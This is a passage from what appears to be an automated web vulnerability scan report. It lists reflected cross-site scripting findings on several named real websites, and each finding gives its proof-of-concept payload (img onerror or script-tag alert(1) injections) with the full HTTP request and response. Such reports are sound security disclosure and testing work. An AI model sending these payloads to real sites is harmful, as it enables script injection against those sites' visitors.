The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload be755<img%20src%3da%20onerror%3dalert(1)>f0101f7e97 was submitted in the REST URL parameter 2. This input was echoed as be755<img src=a onerror=alert(1)>f0101f7e97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/random.phpbe755<img%20src%3da%20onerror%3dalert(1)>f0101f7e97 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/emailafriend?url=http%3A%2F%2Fkroogy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.6.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:41:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2123

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>random.phpbe755<img src=a onerror=alert(1)>f0101f7e97</strong>
...[SNIP]...

5.32. http://kroogy.com/search/redir [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/redir

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47c60<img%20src%3da%20onerror%3dalert(1)>af2c51e84c03eaa87 was submitted in the REST URL parameter 1. This input was echoed as 47c60<img src=a onerror=alert(1)>af2c51e84c03eaa87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /search47c60<img%20src%3da%20onerror%3dalert(1)>af2c51e84c03eaa87/redir?type=web&search=site%3axss.cx HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
Cache-Control: max-age=0
Origin: http://kroogy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:35:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2135

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Search47c60<img src=a onerror=alert(1)>af2c51e84c03eaa87Controller</strong>
...[SNIP]...

5.33. http://kroogy.com/search/redir [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/redir

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 24b8a<img%20src%3da%20onerror%3dalert(1)>a30ab8d9c04aed8ef was submitted in the REST URL parameter 2. This input was echoed as 24b8a<img src=a onerror=alert(1)>a30ab8d9c04aed8ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /search/redir24b8a<img%20src%3da%20onerror%3dalert(1)>a30ab8d9c04aed8ef?type=web&search=site%3axss.cx HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
Cache-Control: max-age=0
Origin: http://kroogy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:35:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2125

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>redir24b8a<img src=a onerror=alert(1)>a30ab8d9c04aed8ef</strong>
...[SNIP]...

5.34. http://kroogy.com/search/special [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/special

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 34153<img%20src%3da%20onerror%3dalert(1)>b5d3aca645c was submitted in the REST URL parameter 1. This input was echoed as 34153<img src=a onerror=alert(1)>b5d3aca645c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search34153<img%20src%3da%20onerror%3dalert(1)>b5d3aca645c/special?search=site%3Axss.cx&type=sports&fl=0 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/noresults?search=site:xss.cx&type=news
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.5.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:44:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2129

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Search34153<img src=a onerror=alert(1)>b5d3aca645cController</strong>
...[SNIP]...

5.35. http://kroogy.com/search/special [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/special

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae757<img%20src%3da%20onerror%3dalert(1)>d4b0d95427 was submitted in the REST URL parameter 2. This input was echoed as ae757<img src=a onerror=alert(1)>d4b0d95427 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/specialae757<img%20src%3da%20onerror%3dalert(1)>d4b0d95427?search=site%3Axss.cx&type=sports&fl=0 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/noresults?search=site:xss.cx&type=news
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.5.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:44:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2120

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>specialae757<img src=a onerror=alert(1)>d4b0d95427</strong>
...[SNIP]...

5.36. http://kroogy.com/search/videos [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/videos

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bf3e5<img%20src%3da%20onerror%3dalert(1)>e2f2d6523e1 was submitted in the REST URL parameter 1. This input was echoed as bf3e5<img src=a onerror=alert(1)>e2f2d6523e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /searchbf3e5<img%20src%3da%20onerror%3dalert(1)>e2f2d6523e1/videos?search=site%3Axss.cx&type=videos&fl=0 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/noresults?search=site:xss.cx&type=news
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.10.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:46:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2129

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Searchbf3e5<img src=a onerror=alert(1)>e2f2d6523e1Controller</strong>
...[SNIP]...

5.37. http://kroogy.com/search/videos [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/videos

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9b764<img%20src%3da%20onerror%3dalert(1)>cca99ab0549 was submitted in the REST URL parameter 2. This input was echoed as 9b764<img src=a onerror=alert(1)>cca99ab0549 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/videos9b764<img%20src%3da%20onerror%3dalert(1)>cca99ab0549?search=site%3Axss.cx&type=videos&fl=0 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/noresults?search=site:xss.cx&type=news
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.10.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:46:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2120

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>videos9b764<img src=a onerror=alert(1)>cca99ab0549</strong>
...[SNIP]...

5.38. http://kroogy.com/search/web [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/web

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aae05<img%20src%3da%20onerror%3dalert(1)>78d7029f299 was submitted in the REST URL parameter 1. This input was echoed as aae05<img src=a onerror=alert(1)>78d7029f299 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /searchaae05<img%20src%3da%20onerror%3dalert(1)>78d7029f299/web?search=site%3Axss.cx&type=web&fl=0 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:39:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2129

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Searchaae05<img src=a onerror=alert(1)>78d7029f299Controller</strong>
...[SNIP]...

5.39. http://kroogy.com/search/web [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/web

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 15d5b<img%20src%3da%20onerror%3dalert(1)>f149c7a1f7f was submitted in the REST URL parameter 2. This input was echoed as 15d5b<img src=a onerror=alert(1)>f149c7a1f7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/web15d5b<img%20src%3da%20onerror%3dalert(1)>f149c7a1f7f?search=site%3Axss.cx&type=web&fl=0 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:39:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2117

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>web15d5b<img src=a onerror=alert(1)>f149c7a1f7f</strong>
...[SNIP]...

5.40. http://partners.nextadnetwork.com/z/371/CD1/id4+106163471 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://partners.nextadnetwork.com
Path:   /z/371/CD1/id4+106163471

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c3ca</script><script>alert(1)</script>8a921d8d37a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /z/371/CD1/id4+1061634715c3ca</script><script>alert(1)</script>8a921d8d37a HTTP/1.1
Host: partners.nextadnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:24:10 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_click_nextadvisor=5932ae843e7b4a5cd3e96139679c6367; expires=Mon, 25-Apr-2011 03:24:10 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=5932ae843e7b4a5cd3e96139679c6367; expires=Tue, 24-May-2011 03:24:10 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=5932ae843e7b4a5cd3e96139679c6367; expires=Tue, 24-May-2011 03:24:10 GMT; path=/; domain=.directtrack.com
X-Server-Name: www@dc1dtweb146
Content-Length: 577
Content-Type: text/html

<html><head><meta http-equiv="refresh" content="0;url=http://affiliate.idgtracker.com/rd/r.php?sid=13&pub=300009&c1=id4 1061634715c3ca</script><script>alert(1)</script>8a921d8d37aCD1&c2=CD1">
<script type="text/javascript">function redirect() {if(document.cookie == ''){location.href="http://affiliate.idgtracker.com/rd/r.php?sid=13&pub=300009&c1=id4 1061634715c3ca</script><script>alert(1)</script>8a921d8d37aCD1&c2=CD1";}}</script>
...[SNIP]...

5.41. http://partners.nextadnetwork.com/z/371/CD1/id4+106163471 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://partners.nextadnetwork.com
Path:   /z/371/CD1/id4+106163471

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2e01"><script>alert(1)</script>0f82d394dbd was submitted in the REST URL parameter 4. This input was echoed as a2e01\"><script>alert(1)</script>0f82d394dbd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /z/371/CD1/id4+106163471a2e01"><script>alert(1)</script>0f82d394dbd HTTP/1.1
Host: partners.nextadnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:24:05 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_click_nextadvisor=94a53209cc67f8af3f6833eb0646d02a; expires=Mon, 25-Apr-2011 03:24:05 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=94a53209cc67f8af3f6833eb0646d02a; expires=Tue, 24-May-2011 03:24:05 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=94a53209cc67f8af3f6833eb0646d02a; expires=Tue, 24-May-2011 03:24:05 GMT; path=/; domain=.directtrack.com
X-Server-Name: www@dc1dtweb130
Content-Length: 565
Content-Type: text/html

<html><head><meta http-equiv="refresh" content="0;url=http://affiliate.idgtracker.com/rd/r.php?sid=13&pub=300009&c1=id4 106163471a2e01\"><script>alert(1)</script>0f82d394dbdCD1&c2=CD1">
<script type="
...[SNIP]...

5.42. http://pub.retailer-amazon.net/banner_120_600_a.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pub.retailer-amazon.net
Path:   /banner_120_600_a.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96112"><img%20src%3da%20onerror%3dalert(1)>e97eff3a4a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 96112"><img src=a onerror=alert(1)>e97eff3a4a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /banner_120_600_a.php?search={$keyw/96112"><img%20src%3da%20onerror%3dalert(1)>e97eff3a4a8ord} HTTP/1.1
Host: pub.retailer-amazon.net
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 620


<html>
<head>
<title> {$keyw96112"><img src=a onerror=alert(1)>e97eff3a4a8ord} </title>
<meta name="description" content="{$keyw96112"><img src=a onerror=alert(1)>e97eff3a4a8ord}">
<meta name="keywor
...[SNIP]...
<iframe name="I1" src="banner_120_600_b.php?search={$keyw96112"><img src=a onerror=alert(1)>e97eff3a4a8ord}" marginwidth="1" marginheight="1" height="600" width="160" scrolling="no" border="0" frameborder="0">
...[SNIP]...

5.43. http://pub.retailer-amazon.net/banner_120_600_a.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pub.retailer-amazon.net
Path:   /banner_120_600_a.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6d4b"><img%20src%3da%20onerror%3dalert(1)>1a348cd60ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a6d4b"><img src=a onerror=alert(1)>1a348cd60ac in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. The payload's leading "> closes the attribute value and its tag, and the img element's onerror event handler then runs the JavaScript without any script tag.

Request

GET /banner_120_600_a.php?search={$keyw/a6d4b"><img%20src%3da%20onerror%3dalert(1)>1a348cd60acord} HTTP/1.1
Host: pub.retailer-amazon.net
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 620


<html>
<head>
<title> {$keywa6d4b"><img src=a onerror=alert(1)>1a348cd60acord} </title>
<meta name="description" content="{$keywa6d4b"><img src=a onerror=alert(1)>1a348cd60acord}">
<meta name="keywor
...[SNIP]...

5.44. http://pub.retailer-amazon.net/banner_120_600_a.php [search parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pub.retailer-amazon.net
Path:   /banner_120_600_a.php

Issue detail

The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29fc5"><img%20src%3da%20onerror%3dalert(1)>575b178e83c was submitted in the search parameter. This input was echoed as 29fc5"><img src=a onerror=alert(1)>575b178e83c in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. The payload's leading "> closes the attribute value and its tag, and the img element's onerror event handler then runs the JavaScript without any script tag.

Request

GET /banner_120_600_a.php?search={$keyword}29fc5"><img%20src%3da%20onerror%3dalert(1)>575b178e83c HTTP/1.1
Host: pub.retailer-amazon.net
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 620


<html>
<head>
<title> {$keyword}29fc5"><img src=a onerror=alert(1)>575b178e83c </title>
<meta name="description" content="{$keyword}29fc5"><img src=a onerror=alert(1)>575b178e83c">
<meta name="keywor
...[SNIP]...

5.45. http://pub.retailer-amazon.net/banner_120_600_a.php [search parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pub.retailer-amazon.net
Path:   /banner_120_600_a.php

Issue detail

